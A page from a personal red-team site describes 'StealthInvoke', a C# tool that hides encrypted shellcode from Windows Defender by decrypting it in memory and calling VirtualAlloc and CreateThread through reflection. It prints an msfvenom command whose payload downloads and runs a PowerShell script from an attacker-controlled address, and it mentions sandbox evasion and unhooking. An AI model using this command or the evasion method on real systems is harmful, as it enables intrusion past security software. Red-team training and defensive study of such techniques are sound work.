πŸ‰
Gurpreet06
  • πŸ‘€Introduction
    • ☠️About me
    • ☎️Contact
  • πŸ‘ΎOffsensive Security
    • ⛓️OSEP
    • πŸ‰OSCP
    • ♾️OSWP
  • πŸ—³οΈHack The Box
    • β›ˆοΈCPTS
  • 🐞Zero-Point Security
    • βš”οΈCRTO
    • ⛓️CRTL
  • πŸ§™β€β™€οΈAltered Security
    • πŸ•·οΈCRTP
    • ⛓️CRTE
  • πŸ”΄Extreme Red Team Laboratories
    • πŸ“¬Active Directory Chains - MailService
    • πŸ“¬Active Directory Chains - IFIXTCENTCEN
  • πŸ’§Sektor7
    • πŸ”Red Team Operator
  • πŸ“•eLearnSecurity
    • ⛓️eCPPTv2
    • πŸ““eJPT
  • 🧊Mikrotik
    • πŸ–₯️MTCNA
  • ☒️Antivirus Bypass
    • β›ˆοΈCrowdStrike Falcon
    • β›ˆοΈBit Defender Premium Antivirus
    • β›ˆοΈSophos Intercept X Antivirus
    • β›ˆοΈSophos Home Premium Antivirus
    • β›ˆοΈKaspersky Plus Protection
    • β›ˆοΈHarmony Checkpoint Security
    • β›ˆοΈWatchGuard Advanced EPDR
    • β›ˆοΈTrend Micro Maximum Security
    • β›ˆοΈESET Security Premium Antivirus
    • β›ˆοΈMalwarebytes Premium Antivirus
    • β›ˆοΈNorton 360
    • β›ˆοΈAVIRA Prime Antivirus
    • β›ˆοΈMcAfee Total Protection
    • β›ˆοΈQuick Heal Total Protection
  • πŸ‘¨β€πŸ’»PROJECTS
    • πŸ•΅οΈInfoSniper (Bypassing Antivirus)
    • 🦈PowerSSH
    • πŸ•΅οΈPyExec
    • β˜ƒοΈPyWMI
    • πŸ“­ShareHunter
    • πŸŒ†ShadowDesk
    • πŸ›‚C2Serv
    • ⛷️StealthInjector
    • πŸ¦‚StealthInvoke
    • πŸ—οΈAMSI Patcher (Bypassing Antivirus)
    • πŸ§–β€β™‚οΈRDP-Stealer
    • πŸ“ΈTakeScreenShot
    • πŸ”‘SharpKeyLogger
    • πŸ‘ΏHellCat (EDR-Escaper)
    • 🎫ETW Patcher (Bypassing Antivirus)
    • πŸ€–PRPT (Bypassing Antivirus)
    • 🌐What Internet Knows About You (OSINT)
    • πŸ”PowerShell SSL Reverse Shell
    • πŸ“ΆWiFi - Crack
    • ⚠️ICMP Data Exfiltration
Powered by GitBook
On this page
  • Features
  • How the script works:
  • Note:
  • POC
  1. PROJECTS

StealthInvoke

Executes payloads undetected in memory.

PreviousStealthInjectorNextAMSI Patcher (Bypassing Antivirus)

Last updated 1 year ago

StealthInvoke.exe is an application written in C#, capable of bypassing Windows Defender. It dynamically invokes the functions VirtualAlloc and CreateThread using the reflection module and decrypts a malicious payload in memory to bypass disk-based detection.

Features

  • Remote Interactive shell

  • Dynamically Invoke functions like VirtualAlloc and CreateThread

  • Basic Sandbox Evasion

How the script works:

  1. Payload Generation: First, we generate a malicious payload using msfvenom. The command is as follows: 

msfvenom --payload windows/exec CMD="cmd.exe /c powershell -c IEX(IWR http://10.X.X.X/shell.ps1 -UseBasicParsing);" EXITFUNC=thread -e x86/shikata_ga_nai -f csharp

  1. Payload Encryption: Next, we encrypt the generated payload using XOR and Base64 encoding. This step is crucial, as it obfuscates the payload, making it more challenging for antivirus programs like Windows Defender to detect the malicious code.

  2. We apply the same encryption approach to the VirtualAlloc and CreateThread function names to obscure their use in the code.

  3. Dynamic Invocation and Decryption: Finally, using the System.Reflection module, we dynamically invoke these functions. The encrypted payload is then decrypted directly in memory.

Note:

Advanced antivirus programs may have hooked functions like "VirtualAlloc" and "CreateThread." To execute our malicious payload, we first need to unhook them and then load our payload into memory.

POC

πŸ‘¨β€πŸ’»
πŸ¦‚
7MB
Xor_Reflected.mp4